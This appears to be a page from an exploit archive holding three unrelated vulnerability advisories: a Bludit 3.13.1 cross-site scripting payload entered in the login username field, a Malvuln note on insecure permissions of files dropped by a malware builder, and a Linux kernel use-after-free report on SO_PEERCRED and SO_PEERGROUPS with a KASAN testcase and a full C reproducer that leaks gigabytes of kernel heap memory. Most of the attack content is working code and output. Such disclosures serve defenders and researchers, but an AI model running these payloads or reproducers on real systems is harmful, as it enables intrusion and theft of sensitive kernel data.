<pre><code># Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)<br /># Date: 19/10/2021<br /># Exploit Author: Vasu (tamilan_mkv)<br /># Vendor Homepage: https://www.bludit.com<br /># Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip<br /># Version: bludit-3-13-1<br /># Tested on: kali linux<br /># CVE : CVE-2021-35323<br /><br />### Steps to reproduce<br /><br />1. Open login page http://localhost:800/admin/login;<br />2. Enter the username place ``admin"><img src=x onerror=alert(1)>``and enter the password<br />3. Trigger the malicious javascript code<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/61285c988de52b7c067fb2e703f2ab83.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CosaNostra Builder <br />Vulnerability: Insecure Permissions<br />Description: The malware creates PE files with insecure permissions when writing to c:\ drive, granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.<br />Type: PE32<br />MD5: 61285c988de52b7c067fb2e703f2ab83<br />Vuln ID: MVID-2022-0471<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />C:\>cacls hate.exe<br />C:\hate.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br />C:\>dir hate.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />01/23/2022 11:37 PM 112,140 hate.exe<br /> 1 File(s) 112,140 bytes<br /> 0 Dir(s) 27,572,977,664 bytes free<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect())<br /><br /># bug description<br /><br />In sock_getsockopt() (in net/core/sock.c), the handlers for the<br />socket options SO_PEERCRED (has probably had a data race since forever<br />that got turned into a UAF read in v2.6.36, commit \"af_unix: Allow<br />SO_PEERCRED to work across namespaces\") and<br />SO_PEERGROUPS (introduced in v4.13, commit \"net: introduce SO_PEERGROUPS<br />getsockopt\") don't use any locking when copying data from<br />sk->sk_peer_cred to userspace.<br /><br />This can race with operations that update sk->sk_peer_cred:<br /><br /> - unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED)<br /> - unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN)<br /><br />This means that if the creds are replaced and freed at the wrong time, a<br />use-after-free read occurs.<br /><br />From what I can tell, the impact on the kernel is limited to data leakage.<br />Theoretically, it could also lead to an out-of-bounds *write* to<br />*userspace* memory if a victim process calls SO_PEERGROUPS on a socket<br />whose ->sk_peer_cred is going away; however, in a normal scenario,<br />SO_PEERGROUPS would only be called on a socket from accept(), and a<br />less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred<br />on that socket.<br /><br /><br /><br /># simple testcase<br /><br />In a Linux VM with CONFIG_KASAN=y and CONFIG_RCU_STRICT_GRACE_PERIOD=y,<br />this issue can be demonstrated with the following testcase.<br /><br />Note that this testcase is using SO_PEERCRED in a weird way: It reads<br />the \"peer credentials\" of a listening socket, which doesn't really make<br />any semantic sense. As far as I can tell from reading the code, you<br />could also trigger the same UAF by racing SO_PEERCRED with repeated<br />calls to connect() and shutdown(<fd>, SHUT_RDWR) instead of listen(),<br />but then the race would get more complicated.<br /><br />```<br />// compile with \"gcc -pthread -o peercred_uaf peercred_uaf.c -Wall\"<br />#define _GNU_SOURCE<br />#include <pthread.h><br />#include <sys/fsuid.h><br />#include <sys/socket.h><br />#include <sys/un.h><br />#include <err.h><br />#include <unistd.h><br />#include <stdio.h><br />#include <sys/syscall.h><br /><br />static int s;<br />static uid_t my_uid;<br />static gid_t my_gid;<br /><br />void *ucred_thread(void *dummy) {<br /> while (1) {<br /> struct ucred ucred;<br /> socklen_t optlen = sizeof(ucred);<br /> if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen))<br /> perror(\"getsockopt\");<br /> }<br />}<br /><br />int main(void) {<br /> my_uid = getuid();<br /> my_gid = getgid();<br /><br /> s = socket(AF_UNIX, SOCK_STREAM, 0);<br /> if (s == -1) err(1, \"socket\");<br /> struct sockaddr_un bind_addr = {<br /> .sun_family = AF_UNIX,<br /> .sun_path = \"/tmp/unix-test-socket\"<br /> };<br /> unlink(bind_addr.sun_path);<br /> if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))<br /> err(1, \"bind\");<br /><br /> pthread_t thread;<br /> if (pthread_create(&thread, NULL, ucred_thread, NULL))<br /> errx(1, \"pthread_create\");<br /><br /> while (1) {<br /> if (listen(s, 16))<br /> perror(\"listen\");<br /> // avoid glibc's automatic thread sync in set*id() wrappers!<br /> // note that setfsuid() doesn't reallocate on no-op request.<br /> if (syscall(__NR_setresuid, my_uid, my_uid, my_uid))<br /> err(1, \"setresuid(raw)\");<br /> }<br />}<br />```<br /><br />This results in the following splat:<br /><br />```<br />BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555) <br />Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619<br /><br />CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849<br />Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014<br />Call Trace:<br /> dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1)) <br /> print_address_description.constprop.0 (mm/kasan/report.c:257) <br />[...]<br /> kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459) <br />[...]<br /> sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555) <br />[...]<br /> __sys_getsockopt (net/socket.c:2216) <br />[...]<br /> __x64_sys_getsockopt (net/socket.c:2232) <br />[...]<br /> do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) <br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) <br />RIP: 0033:0x7f93cd99a5ca<br />Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48<br />All code<br />========<br /> 0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0<br /> 7: f7 d8 neg %eax<br /> 9: 64 89 01 mov %eax,%fs:(%rcx)<br /> c: 48 83 c8 ff or $0xffffffffffffffff,%rax<br /> 10: c3 ret <br /> 11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)<br /> 18: 00 00 00 <br /> 1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1)<br /> 20: 49 89 ca mov %rcx,%r10<br /> 23: b8 37 00 00 00 mov $0x37,%eax<br /> 28: 0f 05 syscall <br /> 2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction<br /> 30: 73 01 jae 0x33<br /> 32: c3 ret <br /> 33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0<br /> 3a: f7 d8 neg %eax<br /> 3c: 64 89 01 mov %eax,%fs:(%rcx)<br /> 3f: 48 rex.W<br /><br />Code starting with the faulting instruction<br />===========================================<br /> 0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax<br /> 6: 73 01 jae 0x9<br /> 8: c3 ret <br /> 9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6<br /> 10: f7 d8 neg %eax<br /> 12: 64 89 01 mov %eax,%fs:(%rcx)<br /> 15: 48 rex.W<br />RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037<br />RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca<br />RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003<br />RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700<br />R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee<br />R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000<br /><br />Allocated by task 618:<br /> kasan_save_stack (mm/kasan/common.c:38) <br /> __kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467) <br /> kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219) <br /> prepare_creds (kernel/cred.c:262) <br /> __sys_setresuid (kernel/sys.c:666) <br /> do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) <br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) <br /><br />Freed by task 618:<br /> kasan_save_stack (mm/kasan/common.c:38) <br /> kasan_set_track (mm/kasan/common.c:46) <br /> kasan_set_free_info (mm/kasan/generic.c:362) <br /> __kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374) <br /> kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499) <br /> rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743) <br /> __do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559) <br /><br />Last potentially related work creation:<br /> kasan_save_stack (mm/kasan/common.c:38) <br /> kasan_record_aux_stack (mm/kasan/generic.c:348) <br /> call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067) <br /> init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613) <br /> unix_listen (net/unix/af_unix.c:648) <br /> __sys_listen (net/socket.c:1727) <br /> __x64_sys_listen (net/socket.c:1734) <br /> do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) <br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) <br /><br />The buggy address belongs to the object at ffff8880355c7c40<br /> which belongs to the cache cred_jar of size 192<br />The buggy address is located 36 bytes inside of<br /> 192-byte region [ffff8880355c7c40, ffff8880355c7d00)<br />The buggy address belongs to the page:<br />page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4<br />head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0<br />flags: 0x4000000000010200(slab|head|zone=1)<br />raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0<br />raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000<br />page dumped because: kasan: bad access detected<br /><br />Memory state around the buggy address:<br /> ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc<br /> ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc<br />>ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb<br /> ^<br /> ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br /> ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc<br />```<br /><br /><br /># root-only reproducer for normal systems<br />The following is a simple reproducer that attempts to use this issue to<br />dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which<br />effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups)<br />from a dangling pointer in groups_to_user().<br />(Note: There are two functions called groups_to_user(). The relevant one<br />is in net/core/sock.c.)<br /><br />This isn't quite a real exploit - it **requires root privileges** to<br />call setgroups() and, if userfaultfd is restricted, also to trap a kernel<br />fault with userfaultfd. I expect that you could get around those<br />limitations with some work though, assuming that the attacker is running<br />in a normal Linux userspace.<br /><br />Note that this bug can still be used to dump gigabytes of kernel heap<br />memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the<br />out-of-bounds read occurs outside of usercopy code:<br /><br />```<br />static int groups_to_user(gid_t __user *dst, const struct group_info *src)<br />{<br /> struct user_namespace *user_ns = current_user_ns();<br /> int i;<br /><br /> for (i = 0; i < src->ngroups; i++)<br /> if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i))<br /> return -EFAULT;<br /><br /> return 0;<br />}<br />```<br /><br /><br />```<br />// gcc -o peergroups-leak peergroups-leak.c -Wall -pthread<br />#define _GNU_SOURCE<br />#include <pthread.h><br />#include <stdbool.h><br />#include <stdlib.h><br />#include <sys/stat.h><br />#include <err.h><br />#include <unistd.h><br />#include <sys/socket.h><br />#include <sys/un.h><br />#include <grp.h><br />#include <sys/wait.h><br />#include <sys/syscall.h><br />#include <fcntl.h><br />#include <sys/eventfd.h><br />#include <limits.h><br />#include <stdio.h><br />#include <sys/ioctl.h><br />#include <sys/mman.h><br />#include <linux/userfaultfd.h><br />#include <linux/membarrier.h><br /><br />// kernel sets upper limit: 65536.<br />// up to 2 pages will be served by slabs, we probably don't want that.<br />// choose a size between order-3 and order-4 (means needs order-4 page)<br />#define ALLOC_SIZE ((0x1000 << 3) * 3 / 2)<br />#define NUM_GROUPS ((ALLOC_SIZE - 8) / 4)<br />#define OUTPUT_MAPPING_LEN 0x400000000<br /><br />static int s;<br />static int launch_eventfd;<br />static unsigned char *output_mapping;<br /><br />static void *getsockopt_threadfn(void *dummy) {<br /> eventfd_t evval;<br /> if (eventfd_read(launch_eventfd, &evval))<br /> err(1, \"eventfd_read\");<br /> socklen_t optlen = INT_MAX;<br /> if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) {<br /> perror(\"getsockopt\");<br /> //system(\"cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");<br /> exit(1);<br /> }<br /> return NULL;<br />}<br /><br />void dump(char *label) {<br /> printf(\"\<br />=== DUMP %s ===\<br />\", label);<br /> system(\"grep 'Node.*Unmovable' /proc/pagetypeinfo\");<br />}<br /><br />int main(void) {<br /> char dummy_char;<br /><br /> // set up sleep-inducing mapping<br /> output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE,<br /> MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);<br /> if (output_mapping == MAP_FAILED) err(1, \"mmap\");<br /> if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE))<br /> err(1, \"mprotect\");<br /> int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);<br /> if (uffd == -1) err(1, \"userfaultfd\");<br /> struct uffdio_api api = {<br /> .api = UFFD_API,<br /> .features = 0<br /> };<br /> if (ioctl(uffd, UFFDIO_API, &api))<br /> err(1, \"UFFDIO_API\");<br /> struct uffdio_register reg = {<br /> .range = {.start = (unsigned long)output_mapping, .len = 0x1000},<br /> .mode = UFFDIO_REGISTER_MODE_MISSING<br /> };<br /> if (ioctl(uffd, UFFDIO_REGISTER, &reg))<br /> err(1, \"UFFDIO_REGISTER\");<br /><br /> // prepare getsockopt() thread<br /> launch_eventfd = eventfd(0, 0);<br /> if (launch_eventfd == -1) err(1, \"eventfd\");<br /> pthread_t thread;<br /> if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL))<br /> errx(1, \"pthread_create\");<br /><br /> // set up for reallocation primitive<br /> int realloc_fd = open(\"/proc/self/maps\", O_RDONLY);<br /> if (realloc_fd == -1) err(1, \"open maps\");<br /><br /> char tmpdir[] = \"/tmp/blah.XXXXXX\";<br /> if (mkdtemp(tmpdir) == NULL) err(1, \"mkdtemp\");<br /> if (chdir(tmpdir)) err(1, \"chdir tmpdir\");<br /> char dummy_name[100];<br /> memset(dummy_name, 'A', 99);<br /> dummy_name[99] = '\\0';<br /> char move_target[200];<br /> sprintf(move_target, \"d/%s\", dummy_name);<br /> mkdir(dummy_name, 0700);<br /> char file_path[200];<br /> sprintf(file_path, \"%s/a\", dummy_name);<br /> int path_len = strlen(tmpdir) + strlen(file_path); // approximate<br /> {<br /> int fd = open(file_path, O_CREAT|O_RDWR, 0600);<br /> if (fd == -1) err(1, \"open deep file\");<br /> if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED)<br /> err(1, \"mmap deep\");<br /> }<br /> bool half_deep_probed = false;<br /> while (path_len < ALLOC_SIZE) {<br /> mkdir(\"d\", 0700);<br /> if (rename(dummy_name, move_target)) err(1, \"rename\");<br /> if (rename(\"d\", dummy_name)) err(1, \"rename 2\");<br /> path_len += strlen(dummy_name) + 1;<br /> if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) {<br /> half_deep_probed = true;<br /> if (pread(realloc_fd, &dummy_char, 1, 0) != 1)<br /> err(1, \"read maps half-deep\");<br /> }<br /> }<br /><br /> s = socket(AF_UNIX, SOCK_STREAM, 0);<br /> if (s == -1) err(1, \"socket\");<br /> struct sockaddr_un bind_addr = {<br /> .sun_family = AF_UNIX,<br /> .sun_path = \"/tmp/unix-test-socket\"<br /> };<br /> unlink(bind_addr.sun_path);<br /> if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr)))<br /> err(1, \"bind\");<br /><br /> pid_t child = fork();<br /> if (child == -1) err(1, \"fork\");<br /> if (child == 0) {<br /> gid_t gid_list[NUM_GROUPS];<br /> gid_t my_gid = getgid();<br /> for (int i=0; i<NUM_GROUPS; i++) {<br /> gid_list[i] = my_gid; // (kernel doesn't deduplicate)<br /> }<br /> dump(\"before setgroups\");<br /> if (setgroups(NUM_GROUPS, gid_list))<br /> err(1, \"setgroups\");<br /> dump(\"after setgroups, expect -1\");<br /> if (listen(s, 16))<br /> err(1, \"listen in child\");<br /> return 0;<br /> }<br /> int status;<br /> if (waitpid(child, &status, 0) != child)<br /> err(1, \"wait\");<br /> if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)<br /> errx(1, \"child didn't exit cleanly\");<br /><br /> // wildly flailing around in the hope of flushing out the task<br /> // (but not the creds yet)<br /> usleep(400 * 1000);<br /> for (int i=0; i<4; i++)<br /> syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);<br /><br /> // launch getsockopt, and wait for it to start<br /> if (eventfd_write(launch_eventfd, 1)) err(1, \"eventfd_write\");<br /> usleep(500 * 1000);<br /><br /> // schedule RCU freeing of the creds<br /> if (listen(s, 16))<br /> err(1, \"listen in parent\");<br /> // wait for RCU (twice to be safe - yes, this is senseless voodoo)<br /> for (int i=0; i<2; i++)<br /> syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, 0);<br /><br /> // crappy reallocation attempt, should overwrite length with ASCII<br /> dump(\"pre-reallocation, expect +1\");<br /> if (pread(realloc_fd, &dummy_char, 1, 0) != 1)<br /> err(1, \"read maps deep\");<br /> dump(\"post-reallocation, expect -1\");<br /><br /> // resume getsockopt<br /> struct uffdio_zeropage zeropage = {<br /> .range = {.start = (unsigned long)output_mapping, .len = 0x1000}<br /> };<br /> if (ioctl(uffd, UFFDIO_ZEROPAGE, &zeropage)) err(1, \"ZEROPAGE\");<br /><br /> // wait for getsockopt to finish<br /> if (pthread_join(thread, NULL)) err(1, \"pthread_join\");<br /> <br /> // dump results<br /> int pagemap_fd = open(\"/proc/self/pagemap\", O_RDONLY);<br /> if (pagemap_fd == -1) err(1, \"open pagemap\");<br /> unsigned long filled_pages = 0;<br /> for (unsigned long addr = (unsigned long)output_mapping;<br /> addr < (unsigned long)output_mapping + OUTPUT_MAPPING_LEN;<br /> addr += 0x1000) {<br /> uint64_t val;<br /> if (pread(pagemap_fd, &val, sizeof(val), addr / 0x1000 * 8) != sizeof(val))<br /> err(1, \"pagemap read\");<br /> if ((val >> 62) == 0)<br /> break;<br /> filled_pages++;<br /> }<br /> printf(\"got %lu pages\<br />\", filled_pages);<br /> FILE *hexdump = popen(\"hexdump -C\", \"w\");<br /> if (!hexdump)<br /> err(1, \"popen\");<br /> fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump);<br /> pclose(hexdump);<br />}<br />```<br /><br /><br /><br /># disclosure deadline<br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2021-12-27.<br /><br /><br /><br /><br />Found by: jhannh@google.com<br /></code></pre>